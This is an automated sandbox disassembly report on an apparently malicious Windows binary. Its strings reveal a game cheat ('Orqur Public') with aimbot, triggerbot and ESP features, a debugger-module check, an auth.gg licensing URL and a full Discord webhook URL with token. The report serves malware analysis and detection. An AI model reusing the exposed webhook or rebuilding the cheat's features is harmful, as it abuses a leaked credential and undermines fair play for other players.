?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QEAAXH_N@Z.MSVCP140(?,?,?,?,?,?,?,?,?,00007FF674172731), ref: 00007FF67418A8F3
?uncaught_exceptions@std@@YAHXZ.MSVCP140(?,?,?,?,?,?,?,?,?,00007FF674172731), ref: 00007FF67418A8FA
?_Osfx@?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAXXZ.MSVCP140(?,?,?,?,?,?,?,?,?,00007FF674172731), ref: 00007FF67418A907

Memory Dump Source

Source File: 00000000.00000002.2542498542.00007FF674141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF674140000, based on PE: true

Associated: 00000000.00000002.2542438852.00007FF674140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542576864.00007FF674190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542612919.00007FF6741BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542637997.00007FF6741BF000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542672801.00007FF6741D9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542699645.00007FF6741DB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff674140000_gh3zRWl4or.jbxd

Similarity

API ID: D@std@@@std@@U?$char_traits@$?sputc@?$basic_streambuf@$__std_exception_copy$?flush@?$basic_ostream@?setstate@?$basic_ios@?uncaught_exceptions@std@@Concurrency::cancel_current_taskOsfx@?$basic_ostream@V12@Xlength_error@std@@
String ID:
API String ID: 1116575367-0
Opcode ID: 484e8cd68b747e1a7008488e7f13651302e9ea2e94a207525d94ac8665bedf14
Instruction ID: d7b1811f687b954f9ecc0c8aa2d850ff3623e0c012d65bbc7f24b0a10a072243
Opcode Fuzzy Hash: 484e8cd68b747e1a7008488e7f13651302e9ea2e94a207525d94ac8665bedf14
Instruction Fuzzy Hash: 1681A523A19B81C6EB20AF59E5C823977A4EB45BE1F148631DB5E877A4DF3DD442C300

Function 00007FF674174660 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 59
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 00007FF67417469D
K32EnumProcessModules.KERNEL32 ref: 00007FF6741746B6
GetCurrentProcess.KERNEL32 ref: 00007FF6741746D5
K32GetModuleBaseNameA.KERNEL32 ref: 00007FF6741746EF
_stricmp.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF67417470B

Strings

dbghelp.dll, xrefs: 00007FF674174685
dbgcore.dll, xrefs: 00007FF674174691

Memory Dump Source

Source File: 00000000.00000002.2542498542.00007FF674141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF674140000, based on PE: true

Associated: 00000000.00000002.2542438852.00007FF674140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542576864.00007FF674190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542612919.00007FF6741BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542637997.00007FF6741BF000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542672801.00007FF6741D9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542699645.00007FF6741DB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff674140000_gh3zRWl4or.jbxd

Similarity

API ID: Process$Current$BaseEnumModuleModulesName_stricmp
String ID: dbgcore.dll$dbghelp.dll
API String ID: 3352702578-4118436743
Opcode ID: 1052afd27c4696830c52129737457caf9a589378738caca0c6bd51082e8aeeab
Instruction ID: fc228b9eb7e4a7c4c768852a26df286dd935f393018548e041ba8ac188230d26
Opcode Fuzzy Hash: 1052afd27c4696830c52129737457caf9a589378738caca0c6bd51082e8aeeab
Instruction Fuzzy Hash: B2213533A2CB82D1EA61AB10F48D2BA73A4FB89B84F444132DA8D83764DF3CD555CB00

Function 00007FF67418A530 Relevance: 3.8, APIs: 3, Instructions: 76
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF674172230: _Query_perf_frequency.MSVCP140 ref: 00007FF67417223D
Part of subcall function 00007FF674172230: _Query_perf_counter.MSVCP140 ref: 00007FF674172246

Sleep.KERNEL32 ref: 00007FF67418A5F1
Sleep.KERNEL32 ref: 00007FF67418A601
Sleep.KERNEL32 ref: 00007FF67418A62C

Memory Dump Source

Source File: 00000000.00000002.2542498542.00007FF674141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF674140000, based on PE: true

Associated: 00000000.00000002.2542438852.00007FF674140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542576864.00007FF674190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542612919.00007FF6741BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542637997.00007FF6741BF000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542672801.00007FF6741D9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542699645.00007FF6741DB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff674140000_gh3zRWl4or.jbxd

Similarity

API ID: Sleep$Query_perf_counterQuery_perf_frequency
String ID:
API String ID: 1739919806-0
Opcode ID: 6e81b4ebca20e304169579ec35ae851d94c4c4444661d0863d96975d93279f40
Instruction ID: c33ca004562b540500a979c8e6eed52d9bdad41aa679c3618464e0555b446d14
Opcode Fuzzy Hash: 6e81b4ebca20e304169579ec35ae851d94c4c4444661d0863d96975d93279f40
Instruction Fuzzy Hash: 3521CC13B3934AC3EE187705B1981B99255DF88BE0F585135DE5D4F7C5ED2CE4814700

Function 00007FF674171140 Relevance: 3.0, APIs: 2, Instructions: 22
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF674171164
__stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF674171185

Memory Dump Source

Source File: 00000000.00000002.2542498542.00007FF674141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF674140000, based on PE: true

Associated: 00000000.00000002.2542438852.00007FF674140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542576864.00007FF674190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542612919.00007FF6741BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542637997.00007FF6741BF000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542672801.00007FF6741D9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542699645.00007FF6741DB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff674140000_gh3zRWl4or.jbxd

Similarity

API ID: __acrt_iob_func__stdio_common_vfprintf
String ID:
API String ID: 2168557111-0
Opcode ID: 3c8e80d9ca3e2c7b43a2e1ea7777abfe8b5e07f2f4ec2fbcf44e96190c50b72e
Instruction ID: e889e76c2000f3d05a03f5cf3eae1354a4116e872fb0e761a3b1d52c18a8b66e
Opcode Fuzzy Hash: 3c8e80d9ca3e2c7b43a2e1ea7777abfe8b5e07f2f4ec2fbcf44e96190c50b72e
Instruction Fuzzy Hash: D4E03033608B81C2D6009B50F94846AB7A4FB987D4F904035EBCC47A24CF7CC165CB40

Function 00007FF674174220 Relevance: 1.5, APIs: 1, Instructions: 44
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

?_Random_device@std@@YAIXZ.MSVCP140 ref: 00007FF67417423F

Memory Dump Source

Source File: 00000000.00000002.2542498542.00007FF674141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF674140000, based on PE: true

Associated: 00000000.00000002.2542438852.00007FF674140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542576864.00007FF674190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542612919.00007FF6741BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542637997.00007FF6741BF000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542672801.00007FF6741D9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542699645.00007FF6741DB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff674140000_gh3zRWl4or.jbxd

Similarity

API ID: Random_device@std@@
String ID:
API String ID: 1041445435-0
Opcode ID: fc5320cb8c62f15217a6e70bccb0b4cdd85a0c930d45a54f5e88c419ab7f7442
Instruction ID: 767eb27bf3aa62a89aaaac8018c5eacdf0a627f8c817a89c7544c6a5f176f914
Opcode Fuzzy Hash: fc5320cb8c62f15217a6e70bccb0b4cdd85a0c930d45a54f5e88c419ab7f7442
Instruction Fuzzy Hash: 76114273B38781C6EB64AB64F4AA3BA6295FBC9350F505135E64ED2BD5EE2CD2048600

Function 00007FF674141000 Relevance: 1.5, APIs: 1, Instructions: 6
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSystemMetrics.USER32 ref: 00007FF674141006

Memory Dump Source

Source File: 00000000.00000002.2542498542.00007FF674141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF674140000, based on PE: true

Associated: 00000000.00000002.2542438852.00007FF674140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542576864.00007FF674190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542612919.00007FF6741BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542637997.00007FF6741BF000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542672801.00007FF6741D9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542699645.00007FF6741DB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff674140000_gh3zRWl4or.jbxd

Similarity

API ID: MetricsSystem
String ID:
API String ID: 4116985748-0
Opcode ID: 3f38d4103dd383ce7011d925abf406c2c39e63471424fb4dbc7d99e96c52857d
Instruction ID: b056c90078ea4fae1eb87307546ae39d8263bc9dbe71176e8afd02896bfaa16f
Opcode Fuzzy Hash: 3f38d4103dd383ce7011d925abf406c2c39e63471424fb4dbc7d99e96c52857d
Instruction Fuzzy Hash: A2B092A5E256C2C6DB087B32AC8A03826606B08241FA00439C50A81310CD2D51964F00

Non-executed Functions

Function 00007FF67417B2C0 Relevance: 111.9, APIs: 4, Strings: 59, Instructions: 1685keyboardCOMMON

Download Yara Rule

APIs

GetAsyncKeyState.USER32 ref: 00007FF67417B313

Part of subcall function 00007FF674153190: malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF6741531F3
Part of subcall function 00007FF674153190: memcpy.VCRUNTIME140 ref: 00007FF674153213
Part of subcall function 00007FF674153190: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF674153233

Part of subcall function 00007FF67417A3D0: CreateThread.KERNEL32 ref: 00007FF67417A4BA
Part of subcall function 00007FF67417A3D0: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF67417A4F5

exit.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF67417CE80
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF67417D10D

Part of subcall function 00007FF67417E8B0: memcpy.VCRUNTIME140(?,?,?,?,00007FF6741718E5), ref: 00007FF67417E8E8

Part of subcall function 00007FF674173980: memset.VCRUNTIME140 ref: 00007FF6741739B0
Part of subcall function 00007FF674173980: ??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEA_N@Z.MSVCP140 ref: 00007FF674173A00
Part of subcall function 00007FF674173980: ??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEA_N@Z.MSVCP140 ref: 00007FF674173A12
Part of subcall function 00007FF674173980: ??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEA_N@Z.MSVCP140 ref: 00007FF674173A24
Part of subcall function 00007FF674173980: ??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEA_N@Z.MSVCP140 ref: 00007FF674173A36
Part of subcall function 00007FF674173980: ??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEAH@Z.MSVCP140 ref: 00007FF674173A48
Part of subcall function 00007FF674173980: ??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEAH@Z.MSVCP140 ref: 00007FF674173A5A
Part of subcall function 00007FF674173980: ??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEAH@Z.MSVCP140 ref: 00007FF674173A6C
Part of subcall function 00007FF674173980: ??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEA_N@Z.MSVCP140 ref: 00007FF674173A7E
Part of subcall function 00007FF674173980: ??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEAH@Z.MSVCP140 ref: 00007FF674173A90
Part of subcall function 00007FF674173980: ??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEA_N@Z.MSVCP140 ref: 00007FF674173AA2
Part of subcall function 00007FF674173980: ??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEAH@Z.MSVCP140 ref: 00007FF674173AB4
Part of subcall function 00007FF674173980: ??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEA_N@Z.MSVCP140 ref: 00007FF674173AC6
Part of subcall function 00007FF674173980: ??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEA_N@Z.MSVCP140 ref: 00007FF674173AD8
Part of subcall function 00007FF674173980: ??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEA_N@Z.MSVCP140 ref: 00007FF674173AEA
Part of subcall function 00007FF674173980: ??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEA_N@Z.MSVCP140 ref: 00007FF674173AFC
Part of subcall function 00007FF674173980: ??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEA_N@Z.MSVCP140 ref: 00007FF674173B0E
Part of subcall function 00007FF674173980: ??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEA_N@Z.MSVCP140 ref: 00007FF674173B20
Part of subcall function 00007FF674173980: ??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEA_N@Z.MSVCP140 ref: 00007FF674173B32
Part of subcall function 00007FF674173980: ??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEA_N@Z.MSVCP140 ref: 00007FF674173B44
Part of subcall function 00007FF674173980: ??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEA_N@Z.MSVCP140 ref: 00007FF674173B56
Part of subcall function 00007FF674173980: ??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEA_N@Z.MSVCP140 ref: 00007FF674173B68
Part of subcall function 00007FF674173980: ??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEA_N@Z.MSVCP140 ref: 00007FF674173B7A
Part of subcall function 00007FF674173980: ??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEA_N@Z.MSVCP140 ref: 00007FF674173B8C
Part of subcall function 00007FF674173980: ??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEAM@Z.MSVCP140 ref: 00007FF674173B9E

_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF67417D1AD

Strings

Rifle Smooth, xrefs: 00007FF67417CCC1
Fov Arrows, xrefs: 00007FF67417CA5A
(AIR STUCK)RISKY FEATURE:, xrefs: 00007FF67417CE40
Save/Load, xrefs: 00007FF67417D03C
Weapon, xrefs: 00007FF67417C318, 00007FF67417C9E8
Draw Filled, xrefs: 00007FF67417CA0E
Shotgun Fov, xrefs: 00007FF67417CBBC
@, xrefs: 00007FF67417B58E
Visuals, xrefs: 00007FF67417C29B
Triggerbot Delay (ms), xrefs: 00007FF67417C71D
Rage Config, xrefs: 00007FF67417D4A6
##Mains, xrefs: 00007FF67417D33F, 00007FF67417D373
Box, xrefs: 00007FF67417C98E
Triggerbot Distance (m), xrefs: 00007FF67417C762
Rifle Fov, xrefs: 00007FF67417CD00
Combat, xrefs: 00007FF67417C21E
Username, xrefs: 00007FF67417CA21
##Main, xrefs: 00007FF67417C4F5, 00007FF67417C529
Skeleton, xrefs: 00007FF67417CA47
Prediction, xrefs: 00007FF67417C64F, 00007FF67417CB3E
Snapline, xrefs: 00007FF67417CA34
Prediction , xrefs: 00007FF67417CD24
Air Stuck, xrefs: 00007FF67417CE58
Weapon config, xrefs: 00007FF67417CB1A
Filled Fov, xrefs: 00007FF67417C788
Semi Config, xrefs: 00007FF67417D442
##Main1, xrefs: 00007FF67417CFFC, 00007FF67417D030
Fov Circle, xrefs: 00007FF67417C775
Orqur Public, xrefs: 00007FF67417B372
%.3f, xrefs: 00007FF67417C73B
Corner, xrefs: 00007FF67417C947, 00007FF67417C979
%.0f, xrefs: 00007FF67417B34E
Save Config, xrefs: 00007FF67417D097
Options, xrefs: 00007FF67417D37F
Legit Config, xrefs: 00007FF67417D3DE
Render Count, xrefs: 00007FF67417CA80
Sniper Smooth, xrefs: 00007FF67417CD63
Misc, xrefs: 00007FF67417C412
Smoothing, xrefs: 00007FF67417C806
Load Config, xrefs: 00007FF67417D133
Aimbot, xrefs: 00007FF67417C5A6
Rifle Settings, xrefs: 00007FF67417CC6F
Fov Size, xrefs: 00007FF67417C7C7
Rank, xrefs: 00007FF67417C9FB
Triggerbot, xrefs: 00007FF67417C662
Shotgun Smooth, xrefs: 00007FF67417CB7D
Distance, xrefs: 00007FF67417CA6D
config.json, xrefs: 00007FF67417D0BD, 00007FF67417D15D
Sniper Settings, xrefs: 00007FF67417CD11
SMG Smooth, xrefs: 00007FF67417CC1F
Config, xrefs: 00007FF67417C395
Hitbox, xrefs: 00007FF67417C89E
Shotgun Settings, xrefs: 00007FF67417CB2B
SMG Fov, xrefs: 00007FF67417CC5E
Sniper Fov, xrefs: 00007FF67417CDA2
Prediction , xrefs: 00007FF67417CBE0
Prediction , xrefs: 00007FF67417CC82
Unload, xrefs: 00007FF67417CE6E
SMG Settings, xrefs: 00007FF67417CBCD

Memory Dump Source

Source File: 00000000.00000002.2542498542.00007FF674141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF674140000, based on PE: true

Associated: 00000000.00000002.2542438852.00007FF674140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542576864.00007FF674190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542612919.00007FF6741BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542637997.00007FF6741BF000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542672801.00007FF6741D9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542699645.00007FF6741DB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff674140000_gh3zRWl4or.jbxd

Similarity

API ID: ??5?$basic_istream@D@std@@@std@@U?$char_traits@V01@$_invalid_parameter_noinfo_noreturn$memcpy$AsyncCreateStateThreadexitfreemallocmemset
String ID: ##Main$##Main1$##Mains$%.0f$%.3f$(AIR STUCK)RISKY FEATURE:$@$Aimbot$Air Stuck$Box$Combat$Config$Corner$Distance$Draw Filled$Filled Fov$Fov Arrows$Fov Circle$Fov Size$Hitbox$Legit Config$Load Config$Misc$Options$Orqur Public$Prediction$Prediction $Prediction $Prediction $Rage Config$Rank$Render Count$Rifle Fov$Rifle Settings$Rifle Smooth$SMG Fov$SMG Settings$SMG Smooth$Save Config$Save/Load$Semi Config$Shotgun Fov$Shotgun Settings$Shotgun Smooth$Skeleton$Smoothing$Snapline$Sniper Fov$Sniper Settings$Sniper Smooth$Triggerbot$Triggerbot Delay (ms)$Triggerbot Distance (m)$Unload$Username$Visuals$Weapon$Weapon config$config.json
API String ID: 2312794053-2218353132
Opcode ID: f4ef39a047af63edb0383367f3846a446bd321a8a066d4b4e0c68740367521f1
Instruction ID: 16cadfca35499fdab12953ebb6ab927e724e1ad5a34241bc3a6718051290c3dd
Opcode Fuzzy Hash: f4ef39a047af63edb0383367f3846a446bd321a8a066d4b4e0c68740367521f1
Instruction Fuzzy Hash: 1623B173928A86C6E701EB29D4852F97760FB99784F158336DA4D977A1EF7CE084CB00

Function 00007FF6741775C0 Relevance: 79.1, APIs: 40, Strings: 4, Instructions: 2124COMMON

Download Yara Rule

APIs

_CxxThrowException.VCRUNTIME140 ref: 00007FF674177613

Part of subcall function 00007FF67417E8B0: memcpy.VCRUNTIME140(?,?,?,?,00007FF6741718E5), ref: 00007FF67417E8E8

Part of subcall function 00007FF67417E8B0: memcpy.VCRUNTIME140(?,?,?,?,00007FF6741718E5), ref: 00007FF67417E988

Part of subcall function 00007FF67417E8B0: Concurrency::cancel_current_task.LIBCPMT ref: 00007FF67417E9A6

Part of subcall function 00007FF67417E8B0: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00007FF6741718E5), ref: 00007FF67417E965

_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF674178CF4
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF674178D35
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF674178D76
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF674178DB5
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF674178DF4
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF674178E33
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF674178E72
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF674178EB1
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF674178EF0
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF674178F2F
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF674178F6E
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF674178FB3
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF674178FF8
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF67417903D
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF674179082
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF6741790C7
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF67417910C
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF674179151
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF674179196
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF6741791DB
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF674179220
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF674179265
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF6741792AA
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF6741792EF
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF674179334
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF674179379
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF6741793BE
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF674179403
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF674179448
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF67417948D
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF6741794D2
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF674179517
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF67417955C
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF6741795A1
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF6741795E6
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF67417962B

Part of subcall function 00007FF6741897B0: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,00007FF674172701), ref: 00007FF674189808

_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF674179670
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF6741796B5
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF6741796FA

Strings

success, xrefs: 00007FF67417775D, 00007FF67417778C, 00007FF6741777BB, 00007FF6741777EA, 00007FF674177819, 00007FF674177848, 00007FF674177877, 00007FF6741778A6, 00007FF6741778D5, 00007FF674177904, 00007FF674177933, 00007FF674177962, 00007FF674177991, 00007FF6741779C0, 00007FF6741779EF, 00007FF674177A1E, 00007FF674177A4D, 00007FF674177A7C, 00007FF674177AAB, 00007FF674177ADA, 00007FF674177B09, 00007FF674177B38, 00007FF674177B67, 00007FF674177B96, 00007FF674177BC5, 00007FF674177BF4, 00007FF674177C23, 00007FF674177C52, 00007FF674177C81, 00007FF674177CB0, 00007FF674177CDF, 00007FF674177D0E, 00007FF674177D3D, 00007FF674177D6C, 00007FF674177D9B, 00007FF674177DCA, 00007FF674177DF9, 00007FF674177E28, 00007FF674177E57, 00007FF674177E86, 00007FF674177EB5, 00007FF674177EE4, 00007FF674177F13, 00007FF674177F42, 00007FF674177F71, 00007FF674177FA0, 00007FF674177FCF, 00007FF674177FFE, 00007FF67417802D, 00007FF67417805C, 00007FF67417808B, 00007FF6741780BA, 00007FF6741780E9, 00007FF674178118, 00007FF674178147, 00007FF674178176, 00007FF6741781A5, 00007FF6741781D4, 00007FF674178203, 00007FF674178232, 00007FF674178261, 00007FF674178290, 00007FF6741782BF, 00007FF6741782EE, 00007FF67417831D, 00007FF67417834C, 00007FF67417837B, 00007FF6741783AA, 00007FF6741783D9, 00007FF674178408, 00007FF674178437, 00007FF674178466, 00007FF674178495, 00007FF6741784C4, 00007FF6741784F3, 00007FF674178522, 00007FF674178551, 00007FF674178580, 00007FF6741785AF, 00007FF6741785DE, 00007FF67417860D, 00007FF67417863C, 00007FF67417866B, 00007FF67417869A, 00007FF6741786C9, 00007FF6741786F8, 00007FF674178727, 00007FF674178785, 00007FF6741787B4, 00007FF6741787E3, 00007FF674178812, 00007FF674178870, 00007FF67417889F, 00007FF6741788CE, 00007FF6741788FD, 00007FF67417892C, 00007FF67417895B, 00007FF67417898A, 00007FF6741789E8, 00007FF674178A17, 00007FF674178A75, 00007FF674178AA4, 00007FF674178B2B, 00007FF674178B51, 00007FF674178B77, 00007FF674178B9D, 00007FF674178BC3, 00007FF674178BE9, 00007FF674178C35, 00007FF674178C5D, 00007FF674178C86, 00007FF674178CAF
https://auth.gg/, xrefs: 00007FF6741789B9, 00007FF674178A46, 00007FF674178AD3, 00007FF674178B02
https://discord.com/api/webhooks/1247249666907701321/mhniI9J0YWG308w-rJbT6rxKaLF0IflJIgI4sGWLEdUFWwOfglnFe9ULMgnrQPphdYlK, xrefs: 00007FF674178756, 00007FF674178841, 00007FF674178C0F
exists, xrefs: 00007FF6741775D4

Memory Dump Source

